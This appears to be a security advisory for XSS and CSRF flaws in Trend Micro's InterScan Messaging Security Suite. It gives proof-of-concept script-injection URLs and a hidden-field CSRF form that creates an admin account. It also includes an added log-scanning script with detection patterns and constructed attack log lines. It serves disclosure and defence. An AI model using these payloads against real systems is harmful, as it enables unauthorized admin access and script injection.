Trend Micro InterScan Messaging Security Suite is vulnerable to Cross-site Scripting and Cross-site Request Forgery.
Proof of Concept
The proofs of concept for the vulnerabilities are as follows:
Cross-site Scripting (CVE-2012-2995) (CWE-79)
Persistent/Stored XSS
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"<script>alert('XSS')</script>
Non-persistent/Reflected XSS
hxxps://127.0.0.1/initUpdSchPage.imss?src=<script>alert('XSS')</script>
Cross-Site Request Forgery (CVE-2012-2996) (CWE-352)
<html>
  <body>
    <form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
      <input type="hidden" name="enabled" value="on" />
      <input type="hidden" name="authMethod" value="1" />
      <input type="hidden" name="name" value="quorra" />
      <input type="hidden" name="password" value="quorra.123" />
      <input type="hidden" name="confirmPwd" value="quorra.123" />
      <input type="hidden" name="tabAction" value="saveAuth" />
      <input type="hidden" name="gotoTab" value="saveAll" />
      <input type="submit" value="CSRF" />
    </form>
  </body>
</html>
Solution
Currently, we are not aware of any vendor solution. You may contact the vendor for a patch or update of the product.
As a temporary solution, you may restrict access to this application to prevent unauthorized users from making use of these vulnerabilities.
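Until a vendor fix is available, the requests shown in the proof of concept can be watched for in the console's HTTP access log. The script below is an added example, not code from the original advisory or from the product; it assumes a combined log format (the product's own log layout is not given here) and the console host 127.0.0.1:8445 taken from the proof-of-concept URLs, and the log lines it contains are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoints and parameters named in the advisory.
XSS_PARAMS = {
    "/addRuleAttrWrsApproveUrl.imss": "wrsApprovedURL",  # stored XSS (CVE-2012-2995)
    "/initUpdSchPage.imss": "src",                       # reflected XSS (CVE-2012-2995)
}
CSRF_ENDPOINT = "/saveAccountSubTab.imss"                # CSRF (CVE-2012-2996)
SCRIPT_RE = re.compile(r"<\s*/?\s*script\b|javascript:|\bon\w+\s*=", re.IGNORECASE)

# Assumed combined log format: ip ident user [ts] "METHOD target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def analyze_line(line, console_host):
    """Return the findings for one access-log line (empty list if nothing suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    findings = []
    param = XSS_PARAMS.get(url.path)
    if param:
        # parse_qs decodes one layer of %XX; unquote again to catch double-encoded payloads.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if SCRIPT_RE.search(unquote(value)):
                findings.append(f"xss_attempt:{param}")
    if url.path == CSRF_ENDPOINT and m["method"] == "POST":
        # A state-changing POST whose Referer is not the console itself matches the CSRF
        # pattern in the advisory; a missing Referer ("-") is flagged too, as a weaker signal.
        referer = m["referer"]
        ref_host = urlsplit(referer).netloc if referer != "-" else ""
        if ref_host != console_host:
            findings.append(f"csrf_suspect:referer={ref_host or 'none'}")
    return findings

def scan(lines, console_host="127.0.0.1:8445"):
    """Map client IP -> findings, for every line that produced at least one finding."""
    hits = {}
    for line in lines:
        for finding in analyze_line(line, console_host):
            hits.setdefault(LOG_RE.match(line)["ip"], []).append(finding)
    return hits

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '10.0.0.5 - - [26/Sep/2012:10:01:02 +0000] "GET /addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss%22%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1" 200 512 "https://127.0.0.1:8445/" "Mozilla/5.0"',
    '10.0.0.2 - - [26/Sep/2012:10:01:05 +0000] "GET /initUpdSchPage.imss?src=schedule HTTP/1.1" 200 2048 "https://127.0.0.1:8445/" "Mozilla/5.0"',
    '10.0.0.9 - - [26/Sep/2012:10:02:11 +0000] "POST /saveAccountSubTab.imss HTTP/1.1" 302 0 "http://attacker-site.example/lure.html" "Mozilla/5.0"',
    '10.0.0.2 - - [26/Sep/2012:10:03:00 +0000] "POST /saveAccountSubTab.imss HTTP/1.1" 302 0 "https://127.0.0.1:8445/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG).items():
        print(ip, findings)
```

The Referer check is a heuristic only: browsers and proxies may strip the header, so a missing Referer is a prompt for review rather than proof of an attack.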
References
http://cwe.mitre.org/data/definitions/352.html
http://cwe.mitre.org/data/definitions/79.html
http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html